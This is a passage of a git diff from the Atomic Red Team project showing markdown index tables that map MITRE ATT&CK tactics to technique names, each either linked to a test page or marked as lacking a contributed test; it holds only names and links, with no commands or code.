| | | Create Account: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | Keychain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery](../../T1518/T1518.md) | | | | Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | | | | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Impair Defenses: Disable or Modify System Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials in Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Uncommonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Event Triggered Execution: Emond](../../T1546.014/T1546.014.md) | Emond [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) | |
| | | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | | | | | | [Ingress Tool Transfer](../../T1105/T1105.md) | |
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launch Daemon [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | | | | | | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) | |
| | | Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Gatekeeper Bypass [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md) | | Software Packing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Impair Defenses: Indicator Blocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Commonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Indicator Removal on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Masquerading: Masquerade Task or Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) | | [Plist File Modification](../../T1647/T1647.md) | | | | | | | |
| | | Emond [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | | Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Launch Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Hide Artifacts: Hidden Users](../../T1564.002/T1564.002.md) | | | | | | | |
| | | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) | | [Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md) | | | | | | | |
| | | Launch Daemon [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md) | | | | | | | |
| | | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Resource Forking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
| | | | | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Invalid Code Signature [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Run Virtual Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Masquerading: Rename System Utilities [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Spoof Security Alerting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Subvert Trust Controls: Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | |
| | | | | [Obfuscated Files or Information: Compile After Delivery](../../T1027.004/T1027.004.md) | | | | | | | |
| | | | | VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Hide Artifacts: Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Hidden Users [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Compile After Delivery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Clear Command History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md) | | | | | | | |
| | | | | Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Obfuscated Files or Information: Software Packing](../../T1027.002/T1027.002.md) | | | | | | | |
| | | | | Hidden File System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Space after Filename [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Masquerading: Space after Filename](../../T1036.006/T1036.006.md) | | | | | | | |
| | | | | [Hide Artifacts: Hidden Files and Directories](../../T1564.001/T1564.001.md) | | | | | | | |
| | | | | Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | | | | | | | |
| | | | | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
atomics/Indexes/Matrices/matrix.md
-233
View File
@@ -1,233 +0,0 @@
# All Atomic Tests by ATT&CK Tactic & Technique
| initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
| [External Remote Services](../../T1133/T1133.md) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Windows Management Instrumentation](../../T1047/T1047.md) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [Container and Resource Discovery](../../T1613/T1613.md) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Shared Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Shell Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: JavaScript](../../T1059.007/T1059.007.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fileless Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Password Guessing](../../T1110.001/T1110.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Layer Protocol: DNS](../../T1071.004/T1071.004.md) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Phishing: Spearphishing Attachment](../../T1566.001/T1566.001.md) | [Kubernetes Cronjob](../../T1053.007/T1053.007.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Rundll32](../../T1218.011/T1218.011.md) | [OS Credential Dumping](../../T1003/T1003.md) | Cloud Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Deployment Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Exfiltration](../../T1020/T1020.md) | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Regsvcs/Regasm [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LLMNR/NBT-NS Poisoning and Relay [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Group Policy Discovery](../../T1615/T1615.md) | [Replication Through Removable Media](../../T1091/T1091.md) | Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Replication Through Removable Media](../../T1091/T1091.md) | [Inter-Process Communication: Dynamic Data Exchange](../../T1559.002/T1559.002.md) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal Web Session Cookie](../../T1539/T1539.md) | Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Audio Capture](../../T1123/T1123.md) | Traffic Duplication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Supply Chain Compromise](../../T1195/T1195.md) | [User Execution: Malicious File](../../T1204.002/T1204.002.md) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Security Account Manager](../../T1003.002/T1003.002.md) | [Account Discovery: Domain Account](../../T1087.002/T1087.002.md) | [Remote Services: SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [Unsecured Credentials: Cloud Instance Metadata API](../../T1552.005/T1552.005.md) | Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Service Stop](../../T1489/T1489.md) |
| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Revert Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Desktop Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over C2 Channel](../../T1041/T1041.md) | [Remote Access Software](../../T1219/T1219.md) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | [Kubernetes Cronjob](../../T1053.007/T1053.007.md) | HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Multilayer Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
